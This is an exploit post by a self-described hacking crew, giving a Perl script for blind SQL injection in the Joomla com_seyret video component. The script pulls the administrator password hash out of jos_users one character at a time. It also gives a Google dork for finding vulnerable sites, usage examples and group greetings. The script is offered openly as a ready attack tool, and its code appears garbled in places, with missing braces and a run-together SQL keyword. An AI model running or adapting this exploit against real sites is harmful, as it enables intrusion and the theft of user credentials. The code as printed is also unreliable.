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0I'm **RoAd_KiLlEr**member from Inj3ct0r Team 1
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[+]Title:Joomla Component (com_seyret) Blind SQL Injection Exploit
[+]Tested on :Win Xp Sp 2/3
[~] Founded by **RoAd_KiLlEr**
[~] Team: Albanian Hacking Crew
[~] Contact: RoAd_KiLlEr[at]Khg-Crew[dot]Ws
[~] Home: http://a-h-crew.net
[~] Vendor:http://joomlaholic.com/
[~] Download App:http://joomlaholic.com/downloads/2-seyret-video-component
==========ExPl0iT3d by **RoAd_KiLlEr**==========
use LWP::UserAgent;
use Getopt::Long;
system("Title Albanian Hacking Crew");
print " \n";
print " #######################################################################\n";
print "# Joomla Component (com_seyret) Blind SQL Injection Exploit \n";
print "# -----------------------------------------------------------\n";
print "# Author: **RoAd_KiLlEr** \n";
print "# Greetz: Ton![W]indowS,X-n3t,b4cKd00r ~,DarkHacker.,The|DennY`\n";
print "# Site: www.a-h-crew.net\n";
print "# -----------------------------------------------------------\n";
print "# Dork : inurl:com_seyret\n";
print "# Usage: perl exploit.pl host path <options> \n";
print "# Example: perl exploit.pl www.host.com /path/ -a 3 \n";
print "# -----------------------------------------------------------\n";
print "# Options: \n";
print "# -a validid \n";
print " #######################################################################\n";
my $host= $ARGV[0];
my $path= $ARGV[1];
my $userid= 1;
my $aid = $ARGV[2];
my %options = ();
GetOptions(\%options, "u=i", "p=s", "a=i");
print "[~] Exploiting...\n";
$userid = $options{"u"};
$aid = $options{"a"};
syswrite(STDOUT, "[~] MD5-Hash: ", 14);
for(my $i = 1; $i <= 32; $i++)
my $f = 0;
my $h = 48;
while(!$f && $h <= 57)
if(istrue2($host, $path, $userid, $aid, $i, $h))
$f = 1;
syswrite(STDOUT, chr($h), 1);
$h = 97;
while(!$f && $h <= 122)
if(istrue2($host, $path, $userid, $aid, $i, $h))
$f = 1;
syswrite(STDOUT, chr($h), 1);
print "\n[~] Exploiting done\n";
sub istrue2
my $host= shift;
my $path= shift;
my $uid = shift;
my $aid = shift;
my $i = shift;
my $h = shift;
my $ua = LWP::UserAgent->new;
my $query = "http://".$host.$path."index.php? option=com_seyret&task=videodirectlink&id=".$aid." and ascii(SUBSTRING((SELECT password FROMjos_users LIMIT 0,1),".$i.",1))=".$h."";
$ua->proxy('http', "http://".$options{"p"});
my $resp = $ua->get($query);
my $content = $resp->content;
my $regexp = "Back";
if($content =~ /$regexp/)
return 1;
return 0;
[!] Albanian Hacking Crew
[!] **RoAd_KiLlEr**
[!] MaiL: sukihack[at]gmail[dot]com
[!] Greetz To : Ton![w]indowS | X-n3t | b4cKd00r ~ | DarKHackeR. | The|DennY` | EaglE EyE | Lekosta | KHG | THE_1NV1S1BL3 & All Albanian/Kosova Hackers
[!] Spec Th4nks: Inj3ct0r.com & r0073r| indoushka from Dz-Ghost Team| MaFFiTeRRoR | Sid3^effects | The_Exploited | And All My Friendz
[!] Red n'black i dress eagle on my chest
It's good to be an ALBANIAN
Keep my head up high for that flag I die
Im proud to be an ALBANIAN